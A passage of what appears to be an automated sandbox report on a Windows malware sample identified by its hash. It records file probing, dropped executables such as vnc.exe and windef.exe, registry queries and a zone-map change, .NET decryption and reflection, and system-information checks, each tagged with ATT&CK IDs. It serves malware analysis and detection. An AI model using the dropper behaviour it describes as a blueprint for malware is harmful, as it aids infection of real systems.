\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to touch file \"C:\\IPHLPAPI.DLL\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to touch file \"C:\\Windows\\system32\\IPHLPAPI.DLL\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to touch file \"C:\\WINNSI.DLL\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to touch file \"C:\\Windows\\system32\\WINNSI.DLL\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to touch file \"C:\\UxTheme.dll\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to touch file \"C:\\Windows\\system32\\UxTheme.dll\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to touch file \"C:\\Windows\\system32\\rpcss.dll\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to touch file \"C:\\CRYPTBASE.dll\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to touch file \"C:\\Windows\\system32\\CRYPTBASE.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"C:\\3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe.Local\\\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"C:\\Windows\\system32\\UxTheme.dll.Config\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"C:\\3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe:Zone.Identifier\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\vnc.exe:Zone.Identifier\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\windef.exe:Zone.Identifier\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\btpanui\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"C:\\Windows\\System32\\schtasks.exe:Zone.Identifier\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"a:\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"b:\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"d:\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"e:\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"f:\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"g:\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"h:\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" trying to access non-existent file \"i:\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\vnc.exe\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\windef.exe\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" writes file \"c:\\users\\%osuser%\\btpanui\\systempropertiesperformance.exe\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" writes file \"%userprofile%\\btpanui\\systempropertiesperformance.exe\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" writes file \"%temp%\\vnc.exe\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" writes file \"%temp%\\windef.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"MAXIMUMALLOWEDALLOCATIONSIZE\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERSFILES\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERSFILES\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERSFILES\\NAMESPACE\\DELEGATEFOLDERS\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\INPROCSERVER32\"; Key: \"LOADWITHOUTCOM\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\INSTANCE\"; Key: \"CLSID\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\\INPROCSERVER32\"; Key: \"LOADWITHOUTCOM\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\INSTANCE\\INITPROPERTYBAG\"; Key: \"ATTRIBUTES\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\INSTANCE\\INITPROPERTYBAG\"; Key: \"DESCRIPTIONID\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\INSTANCE\\INITPROPERTYBAG\"; Key: \"HELPTOPIC\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\INSTANCE\\INITPROPERTYBAG\"; Key: \"RECURSIVESEARCH\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\INSTANCE\\INITPROPERTYBAG\"; Key: \"TARGETKNOWNFOLDER\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\KINDMAP\"; Key: \".EXE\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\.EXE\"; Key: \"\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\"; Key: \"ISSHORTCUT\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\"; Key: \"NOSTATICDEFAULTVERB\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\"; Key: \"\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\"; Key: \"NEVERDEFAULT\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\\COMMAND\"; Key: \"DELEGATEEXECUTE\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\.ADE\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"SystemPropertiesPerformance.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%USERPROFILE%\\btpanui\\SystemPropertiesPerformance.exe]- [targetUID: 00000000-00005916]\n \"vnc.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\vnc.exe]- [targetUID: 00000000-00005916]\n \"windef.exe\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%TEMP%\\windef.exe]- [targetUID: 00000000-00005916]\n \"winsock.exe\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadResource with parameter {'hModule': '1310720', 'hResInfo': '2127560'}\" (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadResource with parameter {'hModule': '1310720', 'hResInfo': '2127576'}\" (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadResource with parameter {'hModule': '1310720', 'hResInfo': '2127368'}\" (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadResource with parameter {'hModule': '1310720', 'hResInfo': '2127592'}\" (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadResource with parameter {'hModule': '1310720', 'hResInfo': '2127112'}\" (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadResource with parameter {'hModule': '0', 'hResInfo': '2127496'}\" (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadResource with parameter {'hModule': '0', 'hResInfo': '2127512'}\" (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadResource with parameter {'hModule': '0', 'hResInfo': '2127528'}\" (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadResource with parameter {'hModule': '0', 'hResInfo': '2127544'}\" (UID: 00000000-00005916)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"FindResourceW\" with parameter \"9823688\" - (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"FindResourceW\" with parameter \"11546368\" - (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"FindResourceW\" with parameter \"12930928\" - (UID: 00000000-00005916)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "static-135", "relevance": 1, "name": "Dotnet file contains function to dynamically call methods at runtime", "description": "Observed namespace \"System\" and MemberReference \"GetMethod\" in \"windef.exe\"\n Observed namespace \"System\" and MemberReference \"GetMethods\" in \"windef.exe\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "static-134", "relevance": 1, "name": "Dotnet file contains encryption/decryption functions", "description": "Observed namespace \"System.Security.Cryptography\" and MemberReference \"CreateDecryptor\" in \"windef.exe\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb3777a86e950000f0fd7f9a5c247700d0fd7fb8c79f0244f0fd7f00000000400000003f0000002300000000f0fd7facc79f02c15c247760822b772300000000f0fd7f9a5c247700d0fd7fd0c79f025789237780832b7713173a75d8eb3777 (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005916)\n \"svchost.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000e85a2000a4fa4400145c2377435c237770fb44000100000094011e000100000024fa4400935c247740832b77d4a023775ea6607770fb44000100000001000000305b200000000000f4f9440024fa440090fa440095e11f7782580700feffffffd4a023771bbe39750000d37600000000 (UID: 00000000-00005856)\n \"windef.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000e0b3260004fc5400145c2377435c2377d0fc540001000000940124000100000084fb5400935c247740832b77d4a02377059b7077d0fc5400010000000100000080c026000000000054fb540084fb5400f0fb540095e11f7779640700feffffffd4a023771bbe39750000d37600000000 (UID: 00000000-00006132)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006108)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005916)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetWindowTextW\" (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetWindowTextW\" with parameter \"CiceroUIWndFrame\" - (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetWindowTextW\" with parameter \"Start\" - (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetWindowTextW\" with parameter \"Network Flyout\" - (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetWindowTextW\" with parameter \"Task Switching\" - (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetWindowTextW\" with parameter \"Start menu\" - (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetWindowTextW\" with parameter \"TF_FloatingLangBar_WndTitle\" - (UID: 00000000-00005916)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005916)\n \"svchost.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005856)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005916)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600a3e8d9944cdc9f026d82f8765c82b20004010000 (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000300066003900620061003800310030006300390036006500300062003200300033003900330033003000650031003600610064006400620065006600320062006600330036003400380064006500320038003600660061006100610065006100610063002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2b23774af2bb75d8eb3777ac018f0000008f0000000000000000002c022005b8140000000000000000000000000000000000002d021b05b81400000000000000000000606f8f0000000000200000000000000000000000 (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360087e2d99428d69f026d82f8767472970004010000 (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360087e2d99428d69f026d82f8769474970004010000 (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000009700f83b0000ff07000000008f000830be007f0700000830be00302f8f00c83f000098d59f0267e5207700008f00b07997000000000000008f0000000000b079970000000000743f004b80000000587c97000830be00a0939600003b000000008f0000000000b07997008064000000008f00a8769700f83b0000ff07000000008f000830be007f0700000830be007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360087e2d99428d69f026d82f8763c76970004010000 (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000009700f83b0000ff07000000008f000830be007f0700000830be00302f8f00933f000098d59f0267e5207700008f00587b97000000000000008f0000000000587b9700000000003f3f000080000000007e97000830be0068a09600003b000000008f0000000000587b97008064000000008f0050789700f83b0000ff07000000008f000830be007f0700000830be007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360087e2d99428d69f026d82f8766c77970004010000 (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000009700f83b0000ff07000000008f000830be007f0700000830be00302f8f006d3f000098d59f0267e5207700008f00887c97000000000000008f0000000000887c970000000000193f002680000000307f97000830be0068a09600003b000000008f0000000000887c97008064000000008f0080799700f83b0000ff07000000008f000830be007f0700000830be007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360087e2d99428d69f026d82f8769c78970004010000 (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000009700f83b0000ff07000000008f000830be007f0700000830be00302f8f00473f000098d59f0267e5207700008f00b87d97000000000000008f0000000000b87d970000000000f33e00cd80000000608097000830be0068a09600003b000000008f0000000000b87d97008064000000008f00b07a9700f83b0000ff07000000008f000830be007f0700000830be007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360087e2d99428d69f026d82f876c479970004010000 (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"RtlGetVersion\" with parameter 